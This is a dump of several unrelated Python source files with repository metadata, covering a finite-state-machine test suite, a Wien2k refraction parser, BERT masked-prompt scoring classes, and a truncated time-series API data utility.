| 51.504348 | 176 | 0.552592 | 5,534 | 0.934324 | 0 | 0 | 0 | 0 | 0 | 0 | 1,687 | 0.284822 |
d38046899bb752ba34cde2b37feb05ce19cf39d5 | 3,916 | py | Python | fsm/tests/test_fsm.py | romeech/fsm-mixin | 1c561c58979902ac579f2a1be521ec133e57cc64 | [
"MIT"
] | null | null | null | fsm/tests/test_fsm.py | romeech/fsm-mixin | 1c561c58979902ac579f2a1be521ec133e57cc64 | [
"MIT"
] | null | null | null | fsm/tests/test_fsm.py | romeech/fsm-mixin | 1c561c58979902ac579f2a1be521ec133e57cc64 | [
"MIT"
] | null | null | null | import pytest
from mixins.fsm import FinalStateMachineMixin
MSG_START = 'start'
MSG_COMPLETE = 'complete'
MSG_BREAK = 'break'
MSG_RESTART = 'repair'
MSG_UNREGISTERED = 'unknown'
class SampleTask(FinalStateMachineMixin):
STATE_NEW = 'new'
STATE_RUNNING = 'running'
STATE_READY = 'ready'
STATE_FAILED = 'failed'
def __init__(self):
self.status = self.initial_state
@property
def state_field_name(self):
return 'status'
@property
def registered_messages(self):
return [MSG_START, MSG_COMPLETE, MSG_BREAK, MSG_RESTART]
@property
def state_transitions(self):
return {
self.STATE_NEW: {
MSG_START: self._make_transition(self.STATE_RUNNING),
MSG_COMPLETE: self._make_transition(self.STATE_READY),
},
self.STATE_RUNNING: {
MSG_COMPLETE: self._make_transition(self.STATE_READY),
MSG_BREAK: self._make_transition(self.STATE_FAILED),
},
self.STATE_READY: {
# all messages are ignored
},
self.STATE_FAILED: {
MSG_RESTART: self._make_transition(self.STATE_RUNNING),
},
}
@property
def initial_state(self):
return self.STATE_NEW
@pytest.fixture
def sample_task():
return SampleTask()
def test_fsm_uses_state(sample_task):
sample_task.status = SampleTask.STATE_READY
assert getattr(sample_task, sample_task.state_field_name) == sample_task.status
def test_full_succes_path(sample_task):
assert sample_task.status == SampleTask.STATE_NEW
sample_task.accept_message(MSG_START)
assert sample_task.status == SampleTask.STATE_RUNNING
sample_task.accept_message(MSG_BREAK)
assert sample_task.status == SampleTask.STATE_FAILED
sample_task.accept_message(MSG_RESTART)
assert sample_task.status == SampleTask.STATE_RUNNING
sample_task.accept_message(MSG_COMPLETE)
assert sample_task.status == SampleTask.STATE_READY
def test_unregistered_msg_causes_failure(sample_task):
expected_msg = "FSM: Unexpected message ({}) is received.".format(MSG_UNREGISTERED)
with pytest.raises(Exception, message=expected_msg):
sample_task.accept_message(MSG_UNREGISTERED)
def test_short_success_path(sample_task):
assert sample_task.status == SampleTask.STATE_NEW
sample_task.accept_message(MSG_BREAK)
assert sample_task.status == SampleTask.STATE_NEW
sample_task.accept_message(MSG_COMPLETE)
assert sample_task.status == SampleTask.STATE_READY
for msg in [MSG_RESTART, MSG_START, MSG_BREAK]:
sample_task.accept_message(msg)
assert sample_task.status == SampleTask.STATE_READY
class UnrestrictedFsm(SampleTask):
@property
def registered_messages(self):
return []
@pytest.fixture
def unrestricted_fsm():
return UnrestrictedFsm()
def test_unregistred_msg_ignored(unrestricted_fsm):
assert unrestricted_fsm.status == SampleTask.STATE_NEW
unrestricted_fsm.accept_message(MSG_UNREGISTERED)
assert unrestricted_fsm.status == SampleTask.STATE_NEW
def test_unregistred_but_effective_msg(unrestricted_fsm):
assert unrestricted_fsm.status == SampleTask.STATE_NEW
unrestricted_fsm.accept_message(MSG_COMPLETE)
assert unrestricted_fsm.status == SampleTask.STATE_READY
class NotImplementedFsm(FinalStateMachineMixin):
pass
@pytest.fixture
def incomplete_fsm():
return NotImplementedFsm()
def test_state_field_name(incomplete_fsm):
with pytest.raises(NotImplementedError):
incomplete_fsm.state_field_name
def test_registered_messages(incomplete_fsm):
with pytest.raises(NotImplementedError):
incomplete_fsm.registered_messages
def test_state_transitions(incomplete_fsm):
with pytest.raises(NotImplementedError):
incomplete_fsm.state_transitions
| 27.194444 | 87 | 0.728805 | 1,291 | 0.329673 | 0 | 0 | 1,152 | 0.294178 | 0 | 0 | 147 | 0.037538 |
d380a82a7773462c1f6103e59d1fbfbfc17e5379 | 56 | py | Python | mt5_correlation/gui/__init__.py | jamiecash/mt5-correlation | 7d97b78f8c402342d6a24c2ff8a550b520629d01 | [
"MIT"
] | 10 | 2021-05-24T14:27:24.000Z | 2021-05-25T10:25:34.000Z | mt5_correlation/gui/__init__.py | jamiecash/mt5-correlation | 7d97b78f8c402342d6a24c2ff8a550b520629d01 | [
"MIT"
] | null | null | null | mt5_correlation/gui/__init__.py | jamiecash/mt5-correlation | 7d97b78f8c402342d6a24c2ff8a550b520629d01 | [
"MIT"
] | 3 | 2021-05-24T23:39:05.000Z | 2021-12-03T10:05:18.000Z | from mt5_correlation.gui.mdi import CorrelationMDIFrame
| 28 | 55 | 0.892857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
d382d3822a88e748265faacefdd36edf1d822fab | 841 | py | Python | dftparse/wien2k/refract_parser.py | CitrineInformatics/dft-parser | 539fbdafe4d6c6c6aa2434fdf93206d012f75dfc | [
"Apache-2.0"
] | 1 | 2021-04-10T13:09:30.000Z | 2021-04-10T13:09:30.000Z | dftparse/wien2k/refract_parser.py | CitrineInformatics/dft-parser | 539fbdafe4d6c6c6aa2434fdf93206d012f75dfc | [
"Apache-2.0"
] | 1 | 2021-01-16T01:05:30.000Z | 2021-01-16T01:05:30.000Z | dftparse/wien2k/refract_parser.py | CitrineInformatics/dft-parser | 539fbdafe4d6c6c6aa2434fdf93206d012f75dfc | [
"Apache-2.0"
] | null | null | null | from ..core import BlockParser
def _parse_refraction(line, lines):
"""Parse Energy [eV] ref_ind_xx ref_ind_zz extinct_xx extinct_zz"""
split_line = line.split()
energy = float(split_line[0])
ref_ind_xx = float(split_line[1])
ref_ind_zz = float(split_line[2])
extinct_xx = float(split_line[3])
extinct_zz = float(split_line[4])
return {"energy": energy, "ref_ind_xx": ref_ind_xx, "ref_ind_zz": ref_ind_zz, "extinct_xx": extinct_xx,
"extinct_zz": extinct_zz}
base_rules = [
(lambda x: len(x) > 0 and "#" not in x and len(x.split()) == 5, _parse_refraction)
]
class RefractionParser(BlockParser):
"""Parser for Wien2k's .refract file"""
def __init__(self, rules=base_rules):
BlockParser.__init__(self)
for rule in rules:
self.add_rule(rule)
| 28.033333 | 107 | 0.657551 | 217 | 0.258026 | 0 | 0 | 0 | 0 | 0 | 0 | 175 | 0.208086 |
d3836f505332bb014cbedb07ee589147a9cb81f2 | 23,985 | py | Python | prompts/prompt_scorer.py | GpNico/bert_semantics | 9b8f9db7b136d1059e6f82c26fd10d164fe2e78d | [
"MIT"
] | null | null | null | prompts/prompt_scorer.py | GpNico/bert_semantics | 9b8f9db7b136d1059e6f82c26fd10d164fe2e78d | [
"MIT"
] | null | null | null | prompts/prompt_scorer.py | GpNico/bert_semantics | 9b8f9db7b136d1059e6f82c26fd10d164fe2e78d | [
"MIT"
] | null | null | null |
import numpy as np
import pickle
import tqdm
import os
import torch
from prompts.prompt_material import DETS_LIST, CONTENT_STRUCTS_PREFIX_LIST, CONTENT_STRUCTS_MIDDLE_LIST, CONTENT_STRUCTS_SUFFIX_LIST, TRANSFORMATIONS, LOGICAL_PREFIXES_LIST, LOGICAL_STRUCTS_LW_LIST
#######################################
# #
# CONTENT #
# #
#######################################
class ContentPromptScorer:
def __init__(self, model = None, tokenizer = None, device = None, dataset_name = ''):
# Model used to compute scores
self.model = model
self.tokenizer = tokenizer
self.device = device
# Load prompts materials
self.dets_list = DETS_LIST
self.structs_dict = {'prefix': CONTENT_STRUCTS_PREFIX_LIST,
'middle': CONTENT_STRUCTS_MIDDLE_LIST,
'suffix': CONTENT_STRUCTS_SUFFIX_LIST}
# Load transformations names
self.transformations_names = TRANSFORMATIONS
# Define template
self.vanilla_template = '<PREFIX> <DET1> <WORD1> <MIDDLE> <DET2> <WORD2> <SUFFIX>.'
self.key_template = '<det1>-<det2>-<prefix>-<middle>-<suffix>'
# Compute keys
self._compute_keys()
# Where to save data
self.filename = 'prompts\\scores\\content_prompts_scores_{}'.format(dataset_name)
# Compute Prompts
self.create_prompts()
def _compute_keys(self):
"""
Compute all the possible keys in the form idx_{det1}-idx_{det2}-idx_{struct_prefix}-idx_{struct_middle}-idx_{struct_suffix}
"""
N_dets = len(self.dets_list)
N_prefix = len(self.structs_dict['prefix'])
N_middle = len(self.structs_dict['middle'])
N_suffix = len(self.structs_dict['suffix'])
list_of_keys = []
for idx_det1 in range(N_dets):
for idx_det2 in range(N_dets):
for idx_prefix in range(N_prefix):
for idx_middle in range(N_middle):
for idx_suffix in range(N_suffix):
key = self.key_template.replace('<det1>', str(idx_det1)).replace('<det2>', str(idx_det2))
key = key.replace('<prefix>', str(idx_prefix)).replace('<middle>', str(idx_middle)).replace('<suffix>', str(idx_suffix))
list_of_keys.append(key)
self.list_of_keys = list_of_keys
def _from_key_to_words(self, key):
"""
Expect a key of the form idx_{det1}-idx_{det2}-idx_{struct_prefix}-idx_{struct_middle}-idx_{struct_suffix}
"""
list_of_idx = [int(idx) for idx in key.split('-')]
det1 = self.dets_list[list_of_idx[0]]
det2 = self.dets_list[list_of_idx[1]]
prefix = self.structs_dict['prefix'][list_of_idx[2]]
middle = self.structs_dict['middle'][list_of_idx[3]]
suffix = self.structs_dict['suffix'][list_of_idx[4]]
return [det1, det2, prefix, middle, suffix]
def _create_prompt(self, dets, structs):
det1, det2 = dets
prefix, middle, suffix = structs
sentence = self.vanilla_template.replace('<DET1>', det1).replace('<DET2>', det2)
sentence = sentence.replace('<PREFIX>', prefix).replace('<MIDDLE>', middle).replace('<SUFFIX>', suffix)
return sentence
def create_prompts(self):
"""
Returns : keys idx_{det1}-idx_{det2}-idx_{struct_prefix}-idx_{struct_middle}-idx_{struct_suffix}
value sentence
"""
dict_of_prompts = {}
for key in self.list_of_keys:
words_from_keys = self._from_key_to_words(key)
dets, structs = words_from_keys[0:2], words_from_keys[2:5]
sentence = self._create_prompt(dets, structs)
dict_of_prompts[key] = sentence
self.dict_of_prompts = dict_of_prompts
def compute_all_pairs_scores(self, list_of_words):
"""
expect words = list of pairs [HYPONYM, NOUN]
returns : dict -> key "HYPONYM---NOUN"
value dict -> key transf
value dict -> keys idx_{det1}-idx_{det2}-idx_{struct_prefix}-idx_{struct_middle}-idx_{struct_suffix}
value [score_mask1, score_mask2]
"""
# Compute Prompts Scores
if os.path.exists(self.filename): # Previous save
savefile = open(self.filename, 'rb')
all_pairs_scores_dict = pickle.load(savefile)
savefile.close()
else:
all_pairs_scores_dict = {}
num_treated = 0
for words in tqdm.tqdm(list_of_words, total = len(list_of_words)):
word1, word2 = words
key = word1 + '---' + word2
if key in all_pairs_scores_dict.keys(): #If we have already computed this key go to the next
continue
scores_dict = self.batch_compute_one_pair_scores(words)
all_pairs_scores_dict[key] = scores_dict
num_treated += 1
if num_treated % 20000 == 0: #Save from time to time
savefile = open(self.filename, 'wb')
pickle.dump(all_pairs_scores_dict, savefile)
savefile.close()
self.all_pairs_scores_dict = all_pairs_scores_dict
# Save scores
savefile = open(self.filename, 'wb')
pickle.dump(all_pairs_scores_dict, savefile)
savefile.close()
def compute_one_pair_scores(self, words):
"""
expect words = [HYPONYM, NOUN]
returns : dict -> key transf
value dict -> keys idx_{det1}-idx_{det2}-idx_{struct_prefix}-idx_{struct_middle}-idx_{struct_suffix}
value [score_mask1, score_mask2]
"""
# Tokenize the words to know the number of masks to add
word1, word2 = words
masked_token_ids_1 = self.tokenizer(word1)['input_ids'][1:-1]
masked_token_ids_2 = self.tokenizer(word2)['input_ids'][1:-1]
N_masks_1 = len(masked_token_ids_1)
N_masks_2 = len(masked_token_ids_2)
# Construct sentences
scores_dict = {}
for transf in self.transformations_names:
transf_score_dict = {}
for key in self.list_of_keys:
vanilla_sentence = self.dict_of_prompts[key]
sentence, mask1_rank, mask2_rank = self.phi(vanilla_sentence, transf, N_masks_1, N_masks_2)
# Compute input_ids and attention_mask of the sentence
encoding = self.tokenizer(sentence,
return_tensors='pt'
)
input_ids = encoding['input_ids'].to(self.device)
attention_mask = encoding['attention_mask'].to(self.device)
# The model needs the masks_to_predict_pos
masks_to_predict_pos = self.find_masks_pos(input_ids)
score_mask1 = self._compute_model_score(input_ids, attention_mask, masked_token_ids_1, masks_to_predict_pos[mask1_rank - 1])
score_mask2 = self._compute_model_score(input_ids, attention_mask, masked_token_ids_2, masks_to_predict_pos[mask2_rank - 1])
transf_score_dict[key] = [score_mask1, score_mask2]
scores_dict[transf] = transf_score_dict
return scores_dict
def _compute_model_score(self, input_ids, attention_mask, masked_token_ids, masks_to_predict_pos):
# Compute the probabilities and ranks from the model
with torch.no_grad():
probs_n_ranks = self.model.compute_greedy(input_ids, attention_mask, masks_to_predict_pos, masked_token_ids)
# Compute scores
score = probs_n_ranks[:,0].prod()
return score
def batch_compute_one_pair_scores(self, words):
"""
expect words = [HYPONYM, NOUN]
returns : dict -> key transf
value dict -> keys idx_{det1}-idx_{det2}-idx_{struct_prefix}-idx_{struct_middle}-idx_{struct_suffix}
value [score_mask1, score_mask2]
"""
# Tokenize the words to know the number of masks to add
word1, word2 = words
masked_token_ids_1 = self.tokenizer(word1, return_tensors='pt')['input_ids'][:,1:-1].repeat(len(self.list_of_keys),1).to(self.device)
masked_token_ids_2 = self.tokenizer(word2, return_tensors='pt')['input_ids'][:,1:-1].repeat(len(self.list_of_keys),1).to(self.device)
N_masks_1 = masked_token_ids_1.shape[1]
N_masks_2 = masked_token_ids_2.shape[1]
# Construct sentences
scores_dict = {}
for transf in self.transformations_names:
transf_score_dict = {}
sentences = []
mask1_ranks, mask2_ranks = [], []
for key in self.list_of_keys:
vanilla_sentence = self.dict_of_prompts[key]
sentence, mask1_rank, mask2_rank = self.phi(vanilla_sentence, transf, N_masks_1, N_masks_2)
sentences.append(sentence)
mask1_ranks.append(mask1_rank)
mask2_ranks.append(mask2_rank)
# Compute input_ids and attention_mask of the sentence
encoding = self.tokenizer(sentences,
padding = True,
return_tensors='pt'
)
input_ids = encoding['input_ids'].to(self.device)
attention_mask = encoding['attention_mask'].to(self.device)
# The model needs the masks_to_predict_pos
masks_to_predict_pos = self.batch_find_masks_pos(input_ids) # We suppose this is ok
scores_mask1 = self._batch_compute_model_score(input_ids, attention_mask, masked_token_ids_1, self.helper(masks_to_predict_pos, mask1_ranks).to(self.device))
scores_mask2 = self._batch_compute_model_score(input_ids, attention_mask, masked_token_ids_2, self.helper(masks_to_predict_pos, mask2_ranks).to(self.device))
for idx in range(len(self.list_of_keys)):
key = self.list_of_keys[idx]
transf_score_dict[key] = [scores_mask1[idx].item(), scores_mask2[idx].item()]
scores_dict[transf] = transf_score_dict
return scores_dict
def _batch_compute_model_score(self, input_ids, attention_mask, masked_token_ids, masks_to_predict_pos):
# Compute the probabilities and ranks from the model
with torch.no_grad():
probs = self.model.batch_compute_greedy(input_ids, attention_mask, masks_to_predict_pos, masked_token_ids)
# Compute scores
scores = probs.prod(dim=1) # shape [batch_size = len(self.list_of_keys)]
return scores
def batch_find_masks_pos(self, ids_seq):
masks_pos = torch.where(ids_seq == 103)[1]
pos_clusters = []
cluster = []
for k in range(masks_pos.shape[0]):
cluster.append(masks_pos[k])
if (k < len(masks_pos) -1) and (masks_pos[k] + 1 != masks_pos[k + 1]): #The next mask pos does not follow the previous one
pos_clusters.append(torch.LongTensor(cluster))
cluster = []
pos_clusters.append(torch.LongTensor(cluster))
return pos_clusters
def helper(self, list_of_tensors, mask_rank):
batch_size = len(self.list_of_keys)
mask_pos = []
for k in range(batch_size):
mask_pos.append(list_of_tensors[2*k:2*k+2][mask_rank[k] - 1])
return torch.cat(mask_pos)
def find_masks_pos(self, ids_seq):
"""
Compute all mask_token positions in the sequence, then divide it into clusters (following sequence) and returns the mask_rank^th cluster.
"""
def find_all_masks_pos(ids_seq):
pos = []
for k in range(ids_seq.shape[1]):
if ids_seq[0][k] == 103:
pos.append(k)
return pos
all_masks_pos = find_all_masks_pos(ids_seq)
pos_clusters = []
cluster = []
for k in range(len(all_masks_pos)):
cluster.append(all_masks_pos[k])
if (k < len(all_masks_pos) -1) and (all_masks_pos[k] + 1 != all_masks_pos[k + 1]): #The next mask pos does not follow the previous one
pos_clusters.append(cluster)
cluster = []
pos_clusters.append(cluster)
return pos_clusters
def phi(self, vanilla_sentence, transf, N_masks_1, N_masks_2):
"""
Take a sentence s and returns phi(s) and the rank of mask1 (cf. google doc.)
The template vanilla is something like : "MASK1 is MASK2" thus MASK1 is rank 1 and MASK2 is rank 2
Whereas for the transformation opposite : "MASK2 is MASK1" thus MASK1 is rank 2 and MASK2 is rank 1
"""
if transf == 'vanilla':
sentence = vanilla_sentence.replace('<WORD1>', N_masks_1*self.tokenizer.mask_token).replace('<WORD2>', N_masks_2*self.tokenizer.mask_token)
mask1_rank, mask2_rank = 1, 2
elif transf == 'opposite':
sentence = vanilla_sentence.replace('<WORD1>', N_masks_2*self.tokenizer.mask_token).replace('<WORD2>', N_masks_1*self.tokenizer.mask_token)
mask1_rank, mask2_rank = 2, 1
elif transf == 'reverse':
sentence = vanilla_sentence.replace('<WORD1>', N_masks_2*self.tokenizer.mask_token).replace('<WORD2>', N_masks_1*self.tokenizer.mask_token)
mask1_rank, mask2_rank = 2, 1
return sentence, mask1_rank, mask2_rank
#######################################
# #
# LOGICAL #
# #
#######################################
class LogicalPromptScorer:
def __init__(self, model = None, tokenizer = None, device = None, dataset_name = ''):
# Model used to compute scores
self.model = model
self.tokenizer = tokenizer
self.device = device
# Load prompts materials
self.dets_list = DETS_LIST
self.structs_dict = {'prefixes': LOGICAL_PREFIXES_LIST,
'struct_lw': LOGICAL_STRUCTS_LW_LIST}
# Define template
self.vanilla_template = '<PREFIX1> <DET1> <WORD1> <STRUCT_LW> <LW> <PREFIX2> <DET2> <WORD2>.'
self.key_template = '<det1>-<det2>-<prefixes>-<struct_lw>'
# Compute keys
self._compute_keys()
# Where to save data
self.filename = 'prompts\\scores\\logical_prompts_scores_{}'.format(dataset_name)
# Compute Prompts
self.create_prompts()
def _compute_keys(self):
"""
Compute all the possible keys in the form idx_{det1}-idx_{det2}-idx_{prefixes}-idx_{struct_lw}
"""
N_dets = len(self.dets_list)
N_prefixes = len(self.structs_dict['prefixes'])
N_struct_lw = len(self.structs_dict['struct_lw'])
list_of_keys = []
for idx_det1 in range(N_dets):
for idx_det2 in range(N_dets):
for idx_prefixes in range(N_prefixes):
for idx_struct_lw in range(N_struct_lw):
key = self.key_template.replace('<det1>', str(idx_det1)).replace('<det2>', str(idx_det2))
key = key.replace('<prefixes>', str(idx_prefixes)).replace('<struct_lw>', str(idx_struct_lw))
list_of_keys.append(key)
self.list_of_keys = list_of_keys
def _from_key_to_words(self, key):
"""
Expect a key of the form idx_{det1}-idx_{det2}-idx_{struct_prefix}-idx_{struct_middle}-idx_{struct_suffix}
"""
list_of_idx = [int(idx) for idx in key.split('-')]
det1 = self.dets_list[list_of_idx[0]]
det2 = self.dets_list[list_of_idx[1]]
prefixes = self.structs_dict['prefixes'][list_of_idx[2]]
struct_lw = self.structs_dict['struct_lw'][list_of_idx[3]]
return [det1, det2, prefixes, struct_lw]
def _create_prompt(self, dets, prefixes, struct_lw):
det1, det2 = dets
prefix1, prefix2 = prefixes
# Sentence in the right order "This is a seagull, therefore it is a bird."
sentence = self.vanilla_template.replace('<DET1>', det1).replace('<DET2>', det2)
sentence = sentence.replace('<PREFIX1>', prefix1).replace('<PREFIX2>', prefix2).replace('<STRUCT_LW>', struct_lw)
# Sentence in the reverse order "It is a bird, therefore this is a seagull."
sentence_reverse = self.vanilla_template.replace('<DET1>', det2).replace('<DET2>', det1)
sentence_reverse = sentence_reverse.replace('<PREFIX1>', prefix2).replace('<PREFIX2>', prefix1).replace('<STRUCT_LW>', struct_lw)
return sentence, sentence_reverse
def create_prompts(self):
"""
Returns : keys idx_{det1}-idx_{det2}-idx_{prefixes}-idx_{struct_lw}
value [sentence, sentence_reverse]
"""
dict_of_prompts = {}
for key in self.list_of_keys:
words_from_keys = self._from_key_to_words(key)
dets, prefixes, struct_lw = words_from_keys[0:2], words_from_keys[2], words_from_keys[3]
sentence, sentence_reverse = self._create_prompt(dets, prefixes, struct_lw)
dict_of_prompts[key] = [sentence, sentence_reverse]
self.dict_of_prompts = dict_of_prompts
def compute_all_pairs_scores(self, logical_words, list_of_words):
"""
expect words = list of pairs [HYPONYM, NOUN]
returns : dict -> key "HYPONYM---NOUN"
value dict -> keys idx_{det1}-idx_{det2}-idx_{prefixes}-idx_{struct_lw}
value [[score_lw for lw in logical_words], [score_reverse_lw for lw in logical_words]]
"""
# Tokenize the logical words
logical_words_ids = []
for lw in logical_words:
input_ids = self.tokenizer(lw)['input_ids'][1:-1]
assert len(input_ids) == 1 # We only keep logical words mapped to a single token
logical_words_ids.append(input_ids[0])
# Compute Prompts Scores
if os.path.exists(self.filename): # Previous save
savefile = open(self.filename, 'rb')
all_pairs_scores_dict = pickle.load(savefile)
savefile.close()
else:
all_pairs_scores_dict = {}
num_treated = 0
for words in tqdm.tqdm(list_of_words, total = len(list_of_words)):
word1, word2 = words
key = word1 + '---' + word2
if key in all_pairs_scores_dict.keys(): # If we have already computed this key go to the next
continue
scores_dict = self.batch_compute_one_pair_scores(logical_words_ids, words)
all_pairs_scores_dict[key] = scores_dict
num_treated += 1
if num_treated % 20000 == 0: # Save from time to time
savefile = open(self.filename, 'wb')
pickle.dump(all_pairs_scores_dict, savefile)
savefile.close()
self.all_pairs_scores_dict = all_pairs_scores_dict
# Save scores
savefile = open(self.filename, 'wb')
pickle.dump(all_pairs_scores_dict, savefile)
savefile.close()
def compute_one_pair_scores(self, logical_words_ids, words):
"""
expect words = [HYPONYM, NOUN]
returns : dict -> keys idx_{det1}-idx_{det2}-idx_{prefixes}-idx_{struct_lw}
value [[score_lw for lw in logical_words], [score_reverse_lw for lw in logical_words]]
"""
word1, word2 = words
# Construct sentences
scores_dict = {}
for key in self.list_of_keys:
sentence, sentence_reverse = self.dict_of_prompts[key]
sentence = sentence.replace('<WORD1>', word1).replace('<WORD2>', word2).replace('<LW>', self.tokenizer.mask_token)
sentence_reverse = sentence_reverse.replace('<WORD1>', word2).replace('<WORD2>', word1).replace('<LW>', self.tokenizer.mask_token)
# Compute scores for sentence
encoding = self.tokenizer(sentence,
return_tensors='pt'
)
input_ids = encoding['input_ids'].to(self.device)
attention_mask = encoding['attention_mask'].to(self.device)
mask_pos = self.find_mask_pos(input_ids)
scores = self._compute_model_score(input_ids, attention_mask, logical_words_ids, mask_pos)
# Compute scores for sentence_reverse
encoding_reverse = self.tokenizer(sentence_reverse,
return_tensors='pt'
)
input_ids_reverse = encoding_reverse['input_ids'].to(self.device)
attention_mask_reverse = encoding_reverse['attention_mask'].to(self.device)
mask_pos_reverse = self.find_mask_pos(input_ids_reverse)
scores_reverse = self._compute_model_score(input_ids_reverse, attention_mask_reverse, logical_words_ids, mask_pos_reverse)
scores_dict[key] = [scores, scores_reverse]
return scores_dict
def batch_compute_one_pair_scores(self, logical_words_ids, words):
"""
expect words = [HYPONYM, NOUN]
returns : dict -> keys idx_{det1}-idx_{det2}-idx_{prefixes}-idx_{struct_lw}
value [[score_lw for lw in logical_words], [score_reverse_lw for lw in logical_words]]
"""
word1, word2 = words
# Construct sentences
scores_dict = {}
sentences = []
for key in self.list_of_keys:
sentence, sentence_reverse = self.dict_of_prompts[key]
sentence = sentence.replace('<WORD1>', word1).replace('<WORD2>', word2).replace('<LW>', self.tokenizer.mask_token)
sentence_reverse = sentence_reverse.replace('<WORD1>', word2).replace('<WORD2>', word1).replace('<LW>', self.tokenizer.mask_token)
sentences.append(sentence)
sentences.append(sentence_reverse)
# Compute scores for sentence
encoding = self.tokenizer(sentences,
padding = True,
return_tensors='pt')
input_ids = encoding['input_ids'].to(self.device)
attention_mask = encoding['attention_mask'].to(self.device)
mask_pos = self.find_mask_pos(input_ids)
scores = self._batch_compute_model_score(input_ids, attention_mask, logical_words_ids, mask_pos)
for k in range(len(self.list_of_keys)):
key = self.list_of_keys[k]
scores_dict[key] = [scores[2*k], scores[2*k + 1]]
return scores_dict
def _compute_model_score(self, input_ids, attention_mask, masked_token_ids, mask_pos):
# Compute the probabilities and ranks from the model
with torch.no_grad():
probs_n_ranks = self.model.compute_multiple_mono_token(input_ids, attention_mask, mask_pos, masked_token_ids)
# Compute scores
scores = probs_n_ranks[:,0] # drop rank
return scores
def _batch_compute_model_score(self, input_ids, attention_mask, masked_token_ids, mask_pos):
# Compute the probabilities and ranks from the model
with torch.no_grad():
probs = self.model.compute_batch_multiple_mono_token(input_ids, attention_mask, mask_pos, masked_token_ids)
return probs
def find_mask_pos(self, ids_seq):
return torch.where(ids_seq == 103)[1]
| 44.171271 | 197 | 0.603836 | 23,286 | 0.970857 | 0 | 0 | 0 | 0 | 0 | 0 | 6,429 | 0.268043 |
d3840f69ec82ddf2ce2d8d629107b8b236ee07e4 | 7,861 | py | Python | common/util/data.py | minkefusiji/TimeSeriesAnalysisPlugin | 85baac82cece9bac7cabb053673df7cc20efa50d | [
"MIT"
] | null | null | null | common/util/data.py | minkefusiji/TimeSeriesAnalysisPlugin | 85baac82cece9bac7cabb053673df7cc20efa50d | [
"MIT"
] | null | null | null | common/util/data.py | minkefusiji/TimeSeriesAnalysisPlugin | 85baac82cece9bac7cabb053673df7cc20efa50d | [
"MIT"
] | null | null | null | import requests
import json
import os
import sys
import shutil
from .azureblob import AzureBlob
from .azuretable import AzureTable
from .timeutil import get_time_offset, str_to_dt, dt_to_str
from .series import Series
from .constant import STATUS_SUCCESS, STATUS_FAIL
from telemetry import log
# To get the meta of a specific metric from TSANA
# Parameters:]
# config: a dict object which should include TSANA_API_KEY, TSANA_API_ENDPOINT, SERIES_LIMIT
# metric_id: a UUID string
# Return:
# meta: the meta of the specified metric, or None if there is something wrong.
def get_metric_meta(config, metric_id):
headers = {
"x-api-key": config.tsana_api_key,
"Content-Type": "application/json"
}
response = requests.get(config.tsana_api_endpoint + '/metrics/' + metric_id + '/meta', headers = headers)
if response.status_code == 200:
return response.json()
else:
return None
# Verify if the data could be used for this application
# Parameters:
# series_sets: a array of series set
# parameters: parameters of this application.
# Return:
# result: STATUS_FAIL / STATUS_SUCCESS
# message: a description of the result
def do_verify(config, parameters, subscription):
# common headers
headers = {
# The key to access TSANA
"x-api-key": config.tsana_api_key,
"Content-Type": "application/json"
}
# ------TO BE REPLACED: Other application just replace below part-------
# For forecast, check the factors and target has same granularity, and each factor could only contain one series
meta = get_metric_meta(config, parameters['instance']['params']['target']['metricId'])
if meta is None:
return STATUS_FAIL, 'Target is not found. '
target_gran = meta['granularityName']
# Only for custom, the granularity amount is meaningful which is the number of seconds
target_gran_amount = meta['granularityAmount']
for data in parameters['seriesSets']:
if target_gran != data['metricMeta']['granularityName'] or (target_gran == 'Custom' and target_gran_amount != data['metricMeta']['granularityAmount']):
return STATUS_FAIL, 'Granularity must be identical between target and factors. '
# Check series count, and each factor should only contain 1 series
seriesCount = 0
for data in parameters['seriesSets']:
dim = {}
for dimkey in data['dimensionFilter']:
dim[dimkey] = [data['dimensionFilter'][dimkey]]
dt = dt_to_str(str_to_dt(meta['dataStartFrom']))
para = dict(metricId=data['metricId'], dimensions=dim, count=2, startTime=dt) # Let's said 100 is your limitation
response = requests.post(config.tsana_api_endpoint + '/metrics/' + data['metricId'] + '/rank-series', data = json.dumps(para), headers = headers)
ret = response.json()
if ret is None or response.status_code != 200 or 'value' not in ret:
return STATUS_FAIL, 'Read series rank filed. '
seriesCount += len(ret['value'])
if seriesCount > config.series_limit:
return STATUS_FAIL, 'Cannot accept ambiguous factors or too many series in the group, limit is ' + str(config.series_limit) + '.'
return STATUS_SUCCESS, ''
# Query time series from TSANA
# Parameters:
# config: a dict object which should include TSANA_API_KEY, TSANA_API_ENDPOINT
# series_sets: Array of series set
# start_time: inclusive, the first timestamp to be query
# end_time: exclusive
# offset: a number will be added to each timestamp of each time-series. The unit is defined by granularity
# granularityName: if Offset > 0, the granularityName is Monthly / Weekly / Daily / Hourly / Minutely / Secondly / Custom
# granularityAmount: if granularityName is Custom, granularityAmount is the seconds of the exact granularity
# Return:
# A array of Series object
def get_timeseries(config, series_sets, start_time, end_time, offset = 0, granularityName = None, granularityAmount = 0):
# common headers
headers = {
"x-api-key": config.tsana_api_key,
"Content-Type": "application/json"
}
if offset != 0 and granularityName is None:
offset = 0
end_str = dt_to_str(end_time)
start_str = dt_to_str(start_time)
dedup = {}
series = []
# Query each series's tag
for data in series_sets:
dim = {}
if 'dimensionFilter' not in data:
data['dimensionFilter'] = data['filters']
for dimkey in data['dimensionFilter']:
dim[dimkey] = [data['dimensionFilter'][dimkey]]
para = dict(metricId=data['metricId'], dimensions=dim, count=1, startTime=start_str, endTime=end_str)
response = requests.post(config.tsana_api_endpoint + '/metrics/' + data['metricId'] + '/rank-series', data = json.dumps(para), headers = headers)
if response.status_code == 200:
ret = response.json()
for s in ret['value']:
if s['seriesId'] not in dedup:
s['startTime'] = start_str
s['endTime'] = end_str
s['dimension'] = s['dimensions']
del s['dimensions']
series.append(s)
dedup[s['seriesId']] = True
else:
log.info("Fail to call rank %s", json.dumps(para))
return None
# Query the data
multi_series_data = None
if len(series) > 0:
response = requests.post(config.tsana_api_endpoint + '/metrics/series/data', data = json.dumps(dict(value=series)), headers = headers)
if response.status_code == 200:
ret = response.json()
if granularityName is not None:
multi_series_data = [
Series(factor['id']['metricId'], factor['id']['seriesId'], factor['id']['dimension'],
[dict(timestamp = get_time_offset(str_to_dt(y[0]), (granularityName, granularityAmount),
offset)
, value = y[1])
for y in factor['values']])
for factor in ret['value']
]
else:
multi_series_data = [
Series(factor['id']['metricId'], factor['id']['seriesId'], factor['id']['dimension'],
